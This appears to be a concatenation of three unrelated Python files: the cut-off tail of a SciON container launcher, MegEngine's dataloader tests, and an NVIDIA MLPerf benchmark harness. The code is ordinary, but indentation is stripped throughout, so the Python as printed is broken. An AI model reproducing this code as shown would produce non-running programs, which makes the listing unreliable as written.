parser.add_argument('-sp', '--signalparent', action='store_true', help='Signal parent process after procs started')
parser.add_argument('-v', '--version', action='version', version='ScionCC v%s' % version)
parser.add_argument('-x', '--proc', type=str, help='Qualified name of process to start and then exit')
parser.add_argument('-X', '--no_container', action='store_true', help='Perform pre-initialization steps and stop before starting a container')
opts, extra = parser.parse_known_args()
args, kwargs = parse_args(extra)
print "pycc: SciON Container starter with command line options:", str(opts)
# -o or --nomanhole implies --noshell
if opts.nomanhole:
opts.noshell = True
if opts.multiproc:
num_proc = int(opts.multiproc)
if num_proc > 1:
print "pycc: Starting %s child container processes" % (num_proc-1)
global child_procs, childproc_go
childproc_go = Event()
for i in range(1, num_proc):
pinfo = dict(procnum=i)
pname = "Container-child-%s" % pinfo['procnum']
p = Process(name=pname, target=start_childproc, args=(pinfo, opts, args, kwargs))
p.start()
child_procs.append(p)
if opts.daemon:
from daemon import DaemonContext
from lockfile import FileLock
print "pycc: Daemonize process"
# TODO: May need to generate a pidfile based on some parameter or cc name
pidfile = opts.pidfile or 'cc-%s.pid' % str(uuid4())[0:4]
with DaemonContext(pidfile=FileLock(pidfile)):#, stdout=logg, stderr=slogg):
main(opts, *args, **kwargs)
else:
main(opts, *args, **kwargs)
def start_childproc(pinfo, opts, pycc_args, pycc_kwargs):
""" Main entry point for spawned child processes.
NOTE: Signals are relayed to all child processes (SIGINT, SIGTERM etc)
"""
# TODO: log file config, termination handler, set instance config
global child_procs
child_procs = [] # We are a child
if childproc_go:
childproc_go.wait() # Wait until we get the signal that parent is ready
#print "pycc: Starting child process", current_process().name, pinfo
opts.noshell = True
opts.mx = opts.force_clean = opts.broker_clean = False
if not opts.relall:
opts.rel = None
main(opts, *pycc_args, **pycc_kwargs)
def stop_childprocs():
if child_procs:
log.info("Stopping %s child processes", len(child_procs))
for ch in child_procs:
if ch.is_alive():
os.kill(ch.pid, signal.SIGTERM)
# PYCC STEP 3
def main(opts, *args, **kwargs):
"""
Processes arguments and starts the capability container.
"""
def prepare_logging():
# Load logging override config if provided. Supports variants literal and path.
from pyon.core import log as logutil
logging_config_override = None
if opts.logcfg:
if '{' in opts.logcfg:
# Variant 1: Value is dict of config values
try:
eval_value = ast.literal_eval(opts.logcfg)
logging_config_override = eval_value
except ValueError:
raise Exception("Value error in logcfg arg '%s'" % opts.logcfg)
else:
# Variant 2: Value is path to YAML file containing config values
logutil.DEFAULT_LOGGING_PATHS.append(opts.logcfg)
logutil.configure_logging(logutil.DEFAULT_LOGGING_PATHS, logging_config_override=logging_config_override)
def prepare_container():
"""
Walks through pyon initialization in a deterministic way and initializes Container.
In particular make sure configuration is loaded in correct order and
pycc startup arguments are considered.
"""
# SIDE EFFECT: The import triggers static initializers: Gevent monkey patching, setting pyon defaults
import pyon
import threading
threading.current_thread().name = "CC-Main"
import logging
global log
log = logging.getLogger('pycc')
from pyon.core import bootstrap, config
from pyon.util.containers import get_safe, dict_merge
# Set global testing flag to False. We are running as capability container, because
# we started through the pycc program.
bootstrap.testing = False
# Set sysname if provided in startup argument
if opts.sysname:
bootstrap.set_sys_name(opts.sysname)
# Trigger any initializing default logic in get_sys_name
bootstrap.get_sys_name()
command_line_config = kwargs
# This holds the minimal configuration used to bootstrap pycc and pyon and connect to datastores.
bootstrap_config = None
# This holds the new CFG object for pyon. Build it up in proper sequence and conditions.
pyon_config = config.read_standard_configuration() # Initial pyon.yml + pyon.local.yml
# Load config override if provided. Supports variants literal and list of paths
config_override = None
if opts.config:
if '{' in opts.config:
# Variant 1: Dict of config values
try:
eval_value = ast.literal_eval(opts.config)
config_override = eval_value
except ValueError:
raise Exception("Value error in config arg '%s'" % opts.config)
else:
# Variant 2: List of paths
from pyon.util.config import Config
config_override = Config([opts.config]).data
# Determine bootstrap_config
if opts.config_from_directory:
# Load minimal bootstrap config if option "config_from_directory"
bootstrap_config = config.read_local_configuration(['res/config/pyon_min_boot.yml'])
config.apply_local_configuration(bootstrap_config, pyon.DEFAULT_LOCAL_CONFIG_PATHS)
config.apply_configuration(bootstrap_config, config_override)
config.apply_configuration(bootstrap_config, command_line_config)
log.info("config_from_directory=True. Minimal bootstrap configuration: %s", bootstrap_config)
else:
# Otherwise: Set to standard set of local config files plus command line overrides
bootstrap_config = deepcopy(pyon_config)
config.apply_configuration(bootstrap_config, config_override)
config.apply_configuration(bootstrap_config, command_line_config)
# Override sysname from config file or command line
if not opts.sysname and bootstrap_config.get_safe("system.name", None):
new_sysname = bootstrap_config.get_safe("system.name")
bootstrap.set_sys_name(new_sysname)
# Force_clean - deletes sysname datastores
if opts.force_clean:
from pyon.datastore import clear_db_util
log.info("force_clean=True. DROP DATASTORES for sysname=%s", bootstrap.get_sys_name())
clear_db_util.clear_db(bootstrap_config, prefix=bootstrap.get_sys_name(), sysname=bootstrap.get_sys_name())
from pyon.core.interfaces.interfaces import InterfaceAdmin
iadm = InterfaceAdmin(bootstrap.get_sys_name(), config=bootstrap_config)
# If auto_store_interfaces: ensure that all datastores exist and directory is prepared, with config
# WARNING: If multiple containers start concurrently, this may fail
if get_safe(bootstrap_config, "bootstrap.auto_store_interfaces") is True:
log.debug("auto_store_interfaces=True.")
stored_config = deepcopy(pyon_config)
config.apply_configuration(stored_config, config_override)
config.apply_configuration(stored_config, command_line_config)
iadm.create_core_datastores()
iadm.store_config(stored_config)
# Determine the final pyon_config:
# - Start from standard config already set (pyon.yml + local YML files)
# - Optionally load config from directory
if opts.config_from_directory:
config.apply_remote_config(bootstrap_cfg=bootstrap_config, system_cfg=pyon_config)
# - Apply container profile specific config
config.apply_profile_configuration(pyon_config, bootstrap_config)
# - Reapply pyon.local.yml here again for good measure
config.apply_local_configuration(pyon_config, pyon.DEFAULT_LOCAL_CONFIG_PATHS)
# - Last apply any separate command line config overrides
config.apply_configuration(pyon_config, config_override)
config.apply_configuration(pyon_config, command_line_config)
iadm.set_config(pyon_config)
# Set the immediate flag when command line override specified
if opts.immediate:
dict_merge(pyon_config, {"system": {"immediate": True}}, inplace=True)
# Determine system bootmode for bootstrapping actions (unless explicitly specified)
if not pyon_config.get_safe("bootmode"):
set_bootmode = get_safe(pyon_config, "bootstrap.set_bootmode")
if set_bootmode == "auto":
if iadm.system_data_exists():
dict_merge(pyon_config, {"bootmode": "restart"}, inplace=True)
log.info("System bootmode auto-detection is ON. Determined bootmode=%s", pyon_config.get_safe("bootmode", "initial"))
elif set_bootmode == "secondary":
dict_merge(pyon_config, {"bootmode": "secondary"}, inplace=True)
log.info("System bootmode override. Set to bootmode=%s", pyon_config.get_safe("bootmode", ""))
log.info("System in bootmode=%s", pyon_config.get_safe("bootmode", "initial"))
# Bootstrap the pyon framework's core. Load configuration etc.
bootstrap.bootstrap_pyon(pyon_cfg=pyon_config)
# Delete any queues/exchanges owned by sysname if option "broker_clean" is set
if opts.broker_clean:
log.info("broker_clean=True, sysname: %s", bootstrap.get_sys_name())
from putil.rabbitmq.rabbit_util import RabbitManagementUtil
rabbit_util = RabbitManagementUtil(pyon_config, sysname=bootstrap.get_sys_name())
deleted_exchanges, deleted_queues = rabbit_util.clean_by_sysname()
log.info("Exchanges deleted (%s): %s" % (len(deleted_exchanges), ", ".join(deleted_exchanges)))
log.info("Queues deleted (%s): %s" % (len(deleted_queues), ", ".join(deleted_queues)))
if opts.force_clean:
from pyon.util.file_sys import FileSystem
FileSystem._clean(pyon_config)
# If auto_store_interfaces (cont'd): Store interfaces if not yet existing; set up messaging
if get_safe(bootstrap_config, "bootstrap.auto_store_interfaces") is True:
iadm.store_interfaces(idempotent=True)
iadm.declare_core_exchange_resources()
iadm.close()
if opts.no_container:
log.info("no_container=True. Stopping here.")
return None
# Create the container instance
from pyon.container.cc import Container
container = Container(*args, **command_line_config)
container.version = version
return container
def start_container(container):
"""
Start container and all internal managers. Returns when ready.
"""
container.start()
def do_work(container):
"""
Performs initial startup actions with the container as requested in arguments.
Then remains in container shell or infinite wait until container stops.
Returns when container should stop. Raises an exception if anything failed.
"""
if opts.proc:
# Run a one-off process (with the -x argument)
mod, proc = opts.proc.rsplit('.', 1)
log.info("Starting process %s", opts.proc)
container.spawn_process(proc, mod, proc, config={'process': {'type': 'immediate'}})
# And end
return
if opts.rel:
# Start a rel file
start_ok = container.start_rel_from_url(opts.rel)
if not start_ok:
raise Exception("Cannot start deploy file '%s'" % opts.rel)
if opts.mx:
from pyon.public import CFG
port = CFG.get_safe('process.admin_ui.web_server.port', 8080)
container.spawn_process("admin_ui", "ion.process.ui.admin_ui", "AdminUI")
if opts.signalparent:
log.info("Signal parent pid %d that pycc pid %d service start process is complete...", os.getppid(), os.getpid())
os.kill(os.getppid(), signal.SIGUSR1)
def is_parent_gone():
while os.getppid() != 1:
gevent.sleep(1)
log.info("Now I am an orphan ... notifying serve_forever to stop")
os.kill(os.getpid(), signal.SIGINT)
import gevent
ipg = gevent.spawn(is_parent_gone)
container.gl_parent_watch = ipg
# The following will block until TERM signal - may exit with SystemExit
if not opts.noshell and not opts.daemon:
# Keep container running while there is an interactive shell
from pyon.container.shell_api import get_shell_api
setup_ipython_shell(get_shell_api(container))
elif not opts.nomanhole:
# Keep container running while there is an embedded manhole core
from pyon.container.shell_api import get_shell_api
setup_ipython_embed(get_shell_api(container))
else:
# Keep container running until all TERM
container.serve_forever()
def install_terminate_handler():
import gevent
from pyon.core.bootstrap import CFG
shutdown_timeout = int(CFG.get_safe("container.timeout.shutdown") or 0)
terminate_gl = None
def cancel_func():
if terminate_gl:
terminate_gl.kill()
if shutdown_timeout > 0:
pid = os.getpid()
def terminate_unresponsive():
print >>sys.stderr, "ERROR: Container shutdown seems unresponsive. Timeout elapsed (%s sec) -- TERMINATE process (%s)" % (
shutdown_timeout, pid)
os.kill(pid, signal.SIGKILL)
terminate_gl = gevent.spawn_later(shutdown_timeout, terminate_unresponsive)
terminate_gl._glname = "Container terminate timeout"
log.info("Container termination timeout set to %s sec (process %s)", shutdown_timeout, pid)
return cancel_func
def stop_container(container):
try:
if container:
cancel_func = install_terminate_handler()
try:
container.stop(do_exit=False)
finally:
cancel_func()
return True
except Exception as ex:
# We want to make sure to get out here alive
log.error('CONTAINER STOP ERROR', exc_info=True)
return False
def _exists_ipython_dir():
# When multiple containers are started in parallel, all start an embedded IPython shell/manhole.
# There exists a race condition between the IPython creating the default $HOME/.python dir
# leading to an error.
homedir = os.path.expanduser('~')
homedir = os.path.realpath(homedir)
home_ipdir = os.path.join(homedir, ".ipython")
ipdir = os.path.normpath(os.path.expanduser(home_ipdir))
return os.path.exists(ipdir)
def setup_ipython_shell(shell_api=None):
if not _exists_ipython_dir():
log.warn("IPython profile dir not found. Attempting to avoid race condition")
import gevent
import random
gevent.sleep(random.random() * 3.0) # Introduce a random delay to make conflict less likely
ipy_config = _setup_ipython_config()
# monkeypatch the ipython inputhook to be gevent-friendly
import gevent # should be auto-monkey-patched by pyon already.
import select
def stdin_ready():
infds, outfds, erfds = select.select([sys.stdin], [], [], 0)
if infds:
return True
else:
return False
def inputhook_gevent():
try:
while not stdin_ready():
gevent.sleep(0.05)
except KeyboardInterrupt:
pass
return 0
# install the gevent inputhook
# See also https://github.com/ipython/ipython/pull/1654
from IPython.lib.inputhook import inputhook_manager
inputhook_manager.set_inputhook(inputhook_gevent)
inputhook_manager._current_gui = 'gevent'
# First import the embeddable shell class
from IPython.terminal.embed import InteractiveShellEmbed
from mock import patch
# Update namespace of interactive shell
# TODO: Cleanup namespace even further
if shell_api is not None:
locals().update(shell_api)
# Now create an instance of the embeddable shell. The first argument is a
# string with options exactly as you would type them if you were starting
# IPython at the system command line. Any parameters you want to define for
# configuration can thus be specified here.
with patch("IPython.core.interactiveshell.InteractiveShell.init_virtualenv"):
for tries in range(3):
try:
ipshell = InteractiveShellEmbed(
banner1=""" _____ _ ____ _ __ ____________
/ ___/_____(_) __ \/ | / / / ____/ ____/
\__ \/ ___/ / / / / |/ / / / / /
___/ / /__/ / /_/ / /| / / /___/ /___
/____/\___/_/\____/_/ |_/ \____/\____/""",
exit_msg='Leaving SciON CC shell, shutting down container.',
**ipy_config)
ipshell('SciON CC IPython shell. PID: %s. Type ionhelp() for help' % os.getpid())
break
except Exception as ex:
log.debug("Failed IPython initialize attempt (try #%s): %s", tries, str(ex))
import gevent
import random
gevent.sleep(random.random() * 0.5)
def setup_ipython_embed(shell_api=None):
if not _exists_ipython_dir():
log.warn("IPython profile dir not found. Attempting to avoid race condition")
import gevent
import random
gevent.sleep(random.random() * 3.0) # Introduce a random delay to make conflict less likely
# Monkey patch zmq:
# There used to be gevent-zeromq, but it got included without monkey patch into zmq.
# Redo monkey patching, so that IPython's implicit use of zmq is green.
import zmq.green as gzmq
import zmq as ozmq
ozmq.Socket = gzmq.Socket
ozmq.Context = gzmq.Context
ozmq.Poller = gzmq.Poller
oioloop = __import__('zmq.eventloop.ioloop')
oioloop.Poller = gzmq.Poller
# Patch device:
# zmq.green.device still blocks in the C layer. We need to support the "heartbeat"
# which is a simple bounceback, so we simulate it using the following method.
orig_device = gzmq.device
def device_patch(dev_type, insock, outsock, *args):
if dev_type == ozmq.FORWARDER:
while True:
m = insock.recv()
outsock.send(m)
else:
orig_device(dev_type, insock, outsock, *args)
ozmq.device = device_patch
gzmq.device = device_patch
from IPython.kernel.zmq import kernelapp
kernelapp._ctrl_c_message = "Ctrl-C is disabled. To end the process, use Ctrl-\\ or kill"
from IPython import embed_kernel
ipy_config = _setup_ipython_config()
# set specific manhole options
import tempfile
from mock import patch
temp_dir = tempfile.mkdtemp()
ipy_config["config"].Application.ipython_dir = temp_dir
with patch("IPython.core.interactiveshell.InteractiveShell.init_virtualenv"):
for tries in range(3):
try:
embed_kernel(local_ns=shell_api, **ipy_config) # blocks until INT signal
break
except Exception as ex:
log.debug("Failed IPython initialize attempt (try #%s): %s", tries, str(ex))
import gevent
import random
gevent.sleep(random.random() * 0.5)
except:
try:
if os.path.exists(ipy_config["connection_file"]):
os.remove(ipy_config["connection_file"])
except Exception:
pass
raise
# @TODO: race condition here versus ipython, this will leave junk in tmp dir
#import shutil
#try:
# shutil.rmtree(temp_dir)
#except shutil.Error:
# pass
def _setup_ipython_config():
from IPython.config.loader import Config
ipy_config = Config()
conn_file = os.path.join(os.path.abspath(os.curdir), "manhole-%s.json" % os.getpid())
ipy_config.KernelApp.connection_file = conn_file
ipy_config.PromptManager.in_template = '><> '
ipy_config.PromptManager.in2_template = '... '
ipy_config.PromptManager.out_template = '--> '
ipy_config.InteractiveShellEmbed.confirm_exit = False
#ipy_config.Application.log_level = 10 # uncomment for debug level ipython logging
res_args = dict(config=ipy_config, connection_file=conn_file)
return res_args
# main() -----> ENTER
# ----------------------------------------------------------------------------------
# Container life cycle
prepare_logging()
container = None
try:
container = prepare_container()
if container is None:
sys.exit(0)
start_container(container)
# Let child processes run if we are the parent
if child_procs and childproc_go:
childproc_go.set()
except Exception as ex:
log.error('CONTAINER START ERROR', exc_info=True)
stop_childprocs()
stop_container(container)
sys.exit(1)
try:
do_work(container)
except Exception as ex:
stop_childprocs()
stop_container(container)
log.error('CONTAINER PROCESS INTERRUPTION', exc_info=True)
sys.exit(1)
except (KeyboardInterrupt, SystemExit):
log.info("Received a kill signal, shutting down the container (%s)", os.getpid())
# Assumption: stop is so robust, it does not fail even if it was only partially started
stop_childprocs()
stop_ok = stop_container(container)
if not stop_ok:
sys.exit(1)
# START HERE:
# PYCC STEP 1
if __name__ == '__main__':
entry()
|
test_dataloader.py
|
# -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import os
import platform
import time
import numpy as np
import pytest
from megengine.data.collator import Collator
from megengine.data.dataloader import DataLoader
from megengine.data.dataset import ArrayDataset, StreamDataset
from megengine.data.sampler import RandomSampler, SequentialSampler, StreamSampler
from megengine.data.transform import (
Compose,
Normalize,
PseudoTransform,
ToMode,
Transform,
)
def init_dataset():
sample_num = 100
rand_data = np.random.randint(0, 255, size=(sample_num, 1, 32, 32), dtype=np.uint8)
label = np.random.randint(0, 10, size=(sample_num,), dtype=int)
dataset = ArrayDataset(rand_data, label)
return dataset
def test_dataloader_init():
dataset = init_dataset()
with pytest.raises(ValueError):
dataloader = DataLoader(dataset, num_workers=2, divide=True)
with pytest.raises(ValueError):
dataloader = DataLoader(dataset, num_workers=-1)
with pytest.raises(ValueError):
dataloader = DataLoader(dataset, timeout=-1)
with pytest.raises(ValueError):
dataloader = DataLoader(dataset, num_workers=0, divide=True)
dataloader = DataLoader(dataset)
assert isinstance(dataloader.sampler, SequentialSampler)
assert isinstance(dataloader.transform, PseudoTransform)
assert isinstance(dataloader.collator, Collator)
dataloader = DataLoader(
dataset, sampler=RandomSampler(dataset, batch_size=6, drop_last=False)
)
assert len(dataloader) == 17
dataloader = DataLoader(
dataset, sampler=RandomSampler(dataset, batch_size=6, drop_last=True)
)
assert len(dataloader) == 16
class MyStream(StreamDataset):
def __init__(self, number, batch=False, error_foramt=False, block=False):
self.number = number
self.batch = batch
self.error_format = error_foramt
self.block = block
def __iter__(self):
for cnt in range(self.number):
if self.block:
for _ in range(10):
time.sleep(1)
if self.batch:
data = np.random.randint(0, 256, (2, 2, 2, 3), dtype="uint8")
yield (True, (data, [cnt, cnt - self.number]))
else:
data = np.random.randint(0, 256, (2, 2, 3), dtype="uint8")
if self.error_format:
yield (data, cnt)
else:
yield (False, (data, cnt))
raise StopIteration
@pytest.mark.parametrize("batch", [True, False])
@pytest.mark.parametrize("num_workers", [0, 2])
def test_stream_dataloader(batch, num_workers):
dataset = MyStream(100, batch=batch)
sampler = StreamSampler(batch_size=4)
dataloader = DataLoader(
dataset,
sampler,
Compose([Normalize(mean=(103, 116, 123), std=(57, 57, 58)), ToMode("CHW")]),
num_workers=num_workers,
)
check_set = set()
for step, data in enumerate(dataloader):
if step == 10:
break
assert data[0].shape == (4, 3, 2, 2)
assert data[1].shape == (4,)
for i in data[1]:
assert i not in check_set
check_set.add(i)
def test_stream_dataloader_error():
dataset = MyStream(100, error_foramt=True)
sampler = StreamSampler(batch_size=4)
dataloader = DataLoader(dataset, sampler)
with pytest.raises(AssertionError, match=r".*tuple.*"):
data_iter = iter(dataloader)
next(data_iter)
@pytest.mark.parametrize("num_workers", [0, 2])
def test_stream_dataloader_timeout(num_workers):
dataset = MyStream(100, False, block=True)
sampler = StreamSampler(batch_size=4)
dataloader = DataLoader(dataset, sampler, num_workers=num_workers, timeout=2)
with pytest.raises(RuntimeError, match=r".*timeout.*"):
data_iter = iter(dataloader)
next(data_iter)
def test_dataloader_serial():
dataset = init_dataset()
dataloader = DataLoader(
dataset, sampler=RandomSampler(dataset, batch_size=4, drop_last=False)
)
for (data, label) in dataloader:
assert data.shape == (4, 1, 32, 32)
assert label.shape == (4,)
def test_dataloader_parallel():
# set max shared memory to 100M
os.environ["MGE_PLASMA_MEMORY"] = "100000000"
dataset = init_dataset()
dataloader = DataLoader(
dataset,
sampler=RandomSampler(dataset, batch_size=4, drop_last=False),
num_workers=2,
divide=False,
)
for (data, label) in dataloader:
assert data.shape == (4, 1, 32, 32)
assert label.shape == (4,)
dataloader = DataLoader(
dataset,
sampler=RandomSampler(dataset, batch_size=4, drop_last=False),
num_workers=2,
divide=True,
)
for (data, label) in dataloader:
assert data.shape == (4, 1, 32, 32)
assert label.shape == (4,)
@pytest.mark.skipif(
platform.system() == "Windows",
reason="dataloader do not support parallel on windows",
)
def test_dataloader_parallel_timeout():
dataset = init_dataset()
class TimeoutTransform(Transform):
def __init__(self):
pass
def apply(self, input):
time.sleep(10)
return input
dataloader = DataLoader(
dataset,
sampler=RandomSampler(dataset, batch_size=4, drop_last=False),
transform=TimeoutTransform(),
num_workers=2,
timeout=2,
)
with pytest.raises(RuntimeError, match=r".*timeout.*"):
data_iter = iter(dataloader)
batch_data = next(data_iter)
@pytest.mark.skipif(
platform.system() == "Windows",
reason="dataloader do not support parallel on windows",
)
def test_dataloader_parallel_worker_exception():
dataset = init_dataset()
class FakeErrorTransform(Transform):
def __init__(self):
pass
def apply(self, input):
y = x + 1
return input
dataloader = DataLoader(
dataset,
sampler=RandomSampler(dataset, batch_size=4, drop_last=False),
transform=FakeErrorTransform(),
num_workers=2,
)
with pytest.raises(RuntimeError, match=r"worker.*died"):
data_iter = iter(dataloader)
batch_data = next(data_iter)
def _multi_instances_parallel_dataloader_worker():
dataset = init_dataset()
for divide_flag in [True, False]:
train_dataloader = DataLoader(
dataset,
sampler=RandomSampler(dataset, batch_size=4, drop_last=False),
num_workers=2,
divide=divide_flag,
)
val_dataloader = DataLoader(
dataset,
sampler=RandomSampler(dataset, batch_size=10, drop_last=False),
num_workers=2,
divide=divide_flag,
)
for idx, (data, label) in enumerate(train_dataloader):
assert data.shape == (4, 1, 32, 32)
assert label.shape == (4,)
if idx % 5 == 0:
for val_data, val_label in val_dataloader:
assert val_data.shape == (10, 1, 32, 32)
assert val_label.shape == (10,)
def test_dataloader_parallel_multi_instances():
# set max shared memory to 100M
os.environ["MGE_PLASMA_MEMORY"] = "100000000"
_multi_instances_parallel_dataloader_worker()
def test_dataloader_parallel_multi_instances_multiprocessing():
# set max shared memory to 100M
os.environ["MGE_PLASMA_MEMORY"] = "100000000"
import multiprocessing as mp
# mp.set_start_method("spawn")
processes = []
for i in range(4):
p = mp.Process(target=_multi_instances_parallel_dataloader_worker)
p.start()
processes.append(p)
for p in processes:
p.join()
@pytest.mark.parametrize("num_workers", [0, 2])
def test_timeout_event(num_workers):
def cb():
return (True, (np.zeros(shape=(2, 2, 2, 3)), np.ones(shape=(2,))))
dataset = MyStream(100, block=True)
sampler = StreamSampler(batch_size=4)
dataloader = DataLoader(
dataset, sampler, num_workers=num_workers, timeout=2, timeout_event=cb
)
for _, data in enumerate(dataloader):
np.testing.assert_equal(data[0], np.zeros(shape=(4, 2, 2, 3)))
np.testing.assert_equal(data[1], np.ones(shape=(4,)))
break
|
main.py
|
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import re
import os, sys
sys.path.insert(0, os.getcwd())
from code.common.scopedMPS import ScopedMPS, turn_off_mps
from code.common import logging
from code.common import args_to_string, find_config_files, load_configs, run_command
import code.common.arguments as common_args
from importlib import import_module
import multiprocessing as mp
from multiprocessing import Process
def get_benchmark(benchmark_name, conf):
# Do not use a map. We want to import benchmarks as we need them, because some take
# time to load due to plugins.
if benchmark_name == "resnet":
ResNet50 = import_module("code.resnet.tensorrt.ResNet50").ResNet50
return ResNet50(conf)
elif benchmark_name == "mobilenet":
MobileNet = import_module("code.mobilenet.tensorrt.MobileNet").MobileNet
return MobileNet(conf)
elif benchmark_name == "ssd-small":
SSDMobileNet = import_module("code.ssd-small.tensorrt.SSDMobileNet").SSDMobileNet
return SSDMobileNet(conf)
elif benchmark_name == "ssd-large":
SSDResNet34 = import_module("code.ssd-large.tensorrt.SSDResNet34").SSDResNet34
return SSDResNet34(conf)
elif benchmark_name == "gnmt":
GNMTBuilder = import_module("code.gnmt.tensorrt.GNMT").GNMTBuilder
return GNMTBuilder(conf)
else:
raise ValueError("Unknown benchmark: {:}".format(benchmark_name))
def apply_overrides(config, keys):
# Make a copy so we don't modify original dict
config = dict(config)
override_args = common_args.parse_args(keys)
for key in override_args:
# Unset values (None) and unset store_true values (False) are both false-y
if override_args[key]:
config[key] = override_args[key]
return config
def launch_handle_generate_engine(benchmark_name, config, gpu, dla):
retries = 3
timeout = 7200
success = False
for i in range(retries):
# Build engines in another process to make sure we exit with clean cuda context so that MPS can be turned off.
from code.main import handle_generate_engine
p = Process(target=handle_generate_engine, args=(benchmark_name, config, gpu, dla))
p.start()
try:
p.join(timeout)
except KeyboardInterrupt:
p.terminate()
p.join(timeout)
raise KeyboardInterrupt
if p.exitcode == 0:
success = True
break
if not success:
raise RuntimeError("Building engines failed!")
def handle_generate_engine(benchmark_name, config, gpu=True, dla=True):
logging.info("Building engines for {:} benchmark in {:} scenario...".format(benchmark_name, config["scenario"]))
if benchmark_name == "gnmt":
arglist = common_args.GNMT_ENGINE_ARGS
else:
arglist = common_args.GENERATE_ENGINE_ARGS
config = apply_overrides(config, arglist)
if dla and "dla_batch_size" in config:
config["batch_size"] = config["dla_batch_size"]
logging.info("Building DLA engine for {:}_{:}_{:}".format(config["system_id"], benchmark_name, config["scenario"]))
b = get_benchmark(benchmark_name, config)
b.build_engines()
if gpu and "gpu_batch_size" in config:
config["batch_size"] = config["gpu_batch_size"]
config["dla_core"] = None
logging.info("Building GPU engine for {:}_{:}_{:}".format(config["system_id"], benchmark_name, config["scenario"]))
b = get_benchmark(benchmark_name, config)
b.build_engines()
if gpu and config["scenario"] == "Server" and benchmark_name == "gnmt":
b = get_benchmark(benchmark_name, config)
b.build_engines()
logging.info("Finished building engines for {:} benchmark in {:} scenario.".format(benchmark_name, config["scenario"]))
def handle_run_harness(benchmark_name, config, gpu=True, dla=True):
logging.info("Running harness for {:} benchmark in {:} scenario...".format(benchmark_name, config["scenario"]))
if config["scenario"] == "SingleStream":
arglist = common_args.SINGLE_STREAM_HARNESS_ARGS
elif config["scenario"] == "Offline":
arglist = common_args.OFFLINE_HARNESS_ARGS
elif config["scenario"] == "MultiStream":
arglist = common_args.MULTI_STREAM_HARNESS_ARGS
elif config["scenario"] == "Server":
arglist = common_args.SERVER_HARNESS_ARGS
if benchmark_name == "gnmt":
arglist = common_args.GNMT_HARNESS_ARGS
config = apply_overrides(config, arglist)
# Validate arguments
if not dla:
config["dla_batch_size"] = None
if not gpu:
config["gpu_batch_size"] = None
if benchmark_name == "gnmt":
from code.common.harness import GNMTHarness
harness = GNMTHarness(config, name=benchmark_name)
else:
from code.common.harness import BenchmarkHarness
harness = BenchmarkHarness(config, name=benchmark_name)
result = harness.run_harness()
logging.info("Result: {:}".format(result))
# Append result to perf result summary log.
log_dir = config["log_dir"]
summary_file = os.path.join(log_dir, "perf_harness_summary.json")
results = {}
if os.path.exists(summary_file):
with open(summary_file) as f:
results = json.load(f)
config_name = "{:}-{:}".format(config["system_id"], config["scenario"])
if config_name not in results:
results[config_name] = {}
results[config_name][benchmark_name] = result
with open(summary_file, "w") as f:
json.dump(results, f)
# Check accuracy from loadgen logs.
accuracy = check_accuracy(os.path.join(log_dir, config["system_id"], benchmark_name, config["scenario"], "mlperf_log_accuracy.json"),
benchmark_name, config)
summary_file = os.path.join(log_dir, "accuracy_summary.json")
results = {}
if os.path.exists(summary_file):
with open(summary_file) as f:
results = json.load(f)
config_name = "{:}-{:}".format(config["system_id"], config["scenario"])
if config_name not in results:
results[config_name] = {}
results[config_name][benchmark_name] = accuracy
with open(summary_file, "w") as f:
json.dump(results, f)
def check_accuracy(log_file, benchmark_name, config):
accuracy_targets = {
"resnet": 76.46,
"mobilenet": 71.68,
"ssd-large": 20.0,
"ssd-small": 22.0,
"gnmt": 23.9
}
threshold_ratios = {
"resnet": 0.99,
"mobilenet": 0.98,
"ssd-large": 0.99,
"ssd-small": 0.99,
"gnmt": 0.99
}
if not os.path.exists(log_file):
return "Cannot find accuracy JSON file."
with open(log_file, "r") as f:
loadgen_dump = json.load(f)
if len(loadgen_dump) == 0:
return "No accuracy results in PerformanceOnly mode."
threshold = accuracy_targets[benchmark_name] * threshold_ratios[benchmark_name]
if benchmark_name in ["resnet", "mobilenet"]:
cmd = "python3 build/inference/v0.5/classification_and_detection/tools/accuracy-imagenet.py --mlperf-accuracy-file {:} \
--imagenet-val-file data_maps/imagenet/val_map.txt --dtype int32 ".format(log_file)
regex = r"accuracy=([0-9\.]+)%, good=[0-9]+, total=[0-9]+"
elif benchmark_name == "ssd-small":
cmd = "python3 build/inference/v0.5/classification_and_detection/tools/accuracy-coco.py --mlperf-accuracy-file {:} \
--coco-dir {:} --output-file build/ssd-small-results.json".format(
log_file, os.path.join(os.environ.get("PREPROCESSED_DATA_DIR", "build/preprocessed_data"), "coco"))
regex = r"mAP=([0-9\.]+)%"
elif benchmark_name == "ssd-large":
cmd = "python3 build/inference/v0.5/classification_and_detection/tools/accuracy-coco.py --mlperf-accuracy-file {:} \
--coco-dir {:} --output-file build/ssd-large-results.json --use-inv-map".format(
log_file, os.path.join(os.environ.get("PREPROCESSED_DATA_DIR", "build/preprocessed_data"), "coco"))
regex = r"mAP=([0-9\.]+)%"
elif benchmark_name == "gnmt":
cmd = "python3 build/inference/v0.5/translation/gnmt/tensorflow/process_accuracy.py --accuracy_log {:} \
--reference build/preprocessed_data/nmt/GNMT/newstest2014.tok.bpe.32000.de".format(log_file)
regex = r"BLEU: ([0-9\.]+)"
else:
raise ValueError("Unknown benchmark: {:}".format(benchmark_name))
output = run_command(cmd, get_output=True)
result_regex = re.compile(regex)
accuracy = None
with open(os.path.join(os.path.dirname(log_file), "accuracy.txt"), "w") as f:
for line in output:
print(line, file=f)
for line in output:
result_match = result_regex.match(line)
if not result_match is None:
accuracy = float(result_match.group(1))
break
accuracy_result = "PASSED" if accuracy is not None and accuracy >= threshold else "FAILED"
if accuracy_result == "FAILED":
raise RuntimeError("Accuracy = {:.3f}, Threshold = {:.3f}. Accuracy test {:}!".format(accuracy, threshold, accuracy_result))
